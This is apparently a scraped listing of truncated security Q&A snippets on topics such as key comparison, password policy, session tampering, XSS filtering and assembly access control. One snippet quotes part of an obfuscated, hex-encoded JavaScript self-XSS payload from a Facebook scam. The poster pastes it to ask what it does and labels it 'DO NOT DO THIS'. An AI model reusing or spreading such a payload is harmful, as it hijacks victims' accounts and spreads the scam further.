security

问题 I have two PublicKey object.I want to compare both for equality or to check which is latest object using java security API or bouncy castle API.How can i achieve this? 回答1: You can use equals if (!key.equals(copyKey)){ System.out.println("not equals!"); } or check the hashcode of the keys if (key.hashCode() != copyKey.hashCode()) { System.out.println("public key hashCode check failed"); } or compare the hex string of the two public keys String encodedKey1 = new String(Hex.encode(key1

问题 Are there Windows API functions that allows reading what the current password policy is? For instance, minimum length, complexity etc. If not reading, is there a way to verify a password against the policy programmatically? 回答1: See Security Watch Windows Domain Password Policies. You can hit AD using ADSI or its wrappers. I found a VBScript sample. You can translate it to any language you want: Sub ListPasswordPolicyInfo( strDomain ) Dim objComputer Set objComputer = GetObject("WinNT://" &

问题 I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work? Here's the source code: // (DO NOT DO THIS!) Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22

问题 When a low-privilege non-administrator user logs into my web app successfully, I am storing the following data in the $_SESSION array: $_SESSION = array( 'user_id' => 2343, // whatever their user_id number is from the DB 'allow_admin' => false, // don't give them access to admin tools 'allow_edit' => false, // don't let them edit stuff ); Is there any way that they could manipulate the $_SESSION array to give them Admin or Edit access, apart from somehow editing the session files in /tmp ?

问题 Closed . This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 4 years ago . What is the best and most secure way to license software? Is there an existing program for doing so? I want to sell a script of mine, but I want to make sure that users cannot redistribute or sell it themselves (of course, if they deactivate the registration on their own computer

问题 I'm working on preventing cross site scripting (XSS) in a Java, Spring based, Web application. I have already implemented a servlet filter similar to this example http://greatwebguy.com/programming/java/simple-cross-site-scripting-xss-servlet-filter/ which sanitizes all the input into the application. As an extra security measure I would like to also sanitize all output of the application in all JSPs. I have done some research to see how this could be done and found two complementary options.

问题 The lack of reflection in Medium Trust hosting environments seems to cause a lot of problems for many popular web applications. Why is ReflectionPermission disabled by default with Medium Trust? What risk does reflection pose in a shared hosting environment? For random reference, see MSDN: How to use Medium Trust in ASP.NET 2.0 回答1: Reflection allows malicious code to inspect all kinds of secrets: not so much intellectual property (though sure, that too), but data that should be private and

问题 I'm using A createuserwizard control. On the CreatedUser Event I placed this code to add the user to a role. protected void RegisterUser_CreatedUser(object sender, EventArgs e) { FormsAuthentication.SetAuthCookie(RegisterUser.UserName, false /* createPersistentCookie */); if (!Roles.IsUserInRole("Test")) { var User= Membership.GetUser(); Roles.AddUserToRole(User.UserName, "Test"); } string continueUrl = RegisterUser.ContinueDestinationPageUrl; if (String.IsNullOrEmpty(continueUrl)) {

问题 Our web-based applications has user accounts tied down to users with the passwords specified during account creation. In the case of Java, how does one process the password securely, before persisting its hash in the database. To be more specific, how does one ensure that the string holding the password is garbage collected within a sufficiently short interval of time ? 回答1: If you have the possibility (may be difficult in web applications), it would be better to store passwords in character

问题 Is there a way to have a .NET assembly accessible for only authorized sources? I mean I want to have a DLL that contains components, but I don't want anyone to be able to use these components but the other DLLs EXEs in my solution. I do want them to be in separated DLLs though. Restriction on namespace might also be a good idea if this feature exists out there. Is there a way? 回答1: You can create internal classes. And the give your specified assemblies to access these classes by using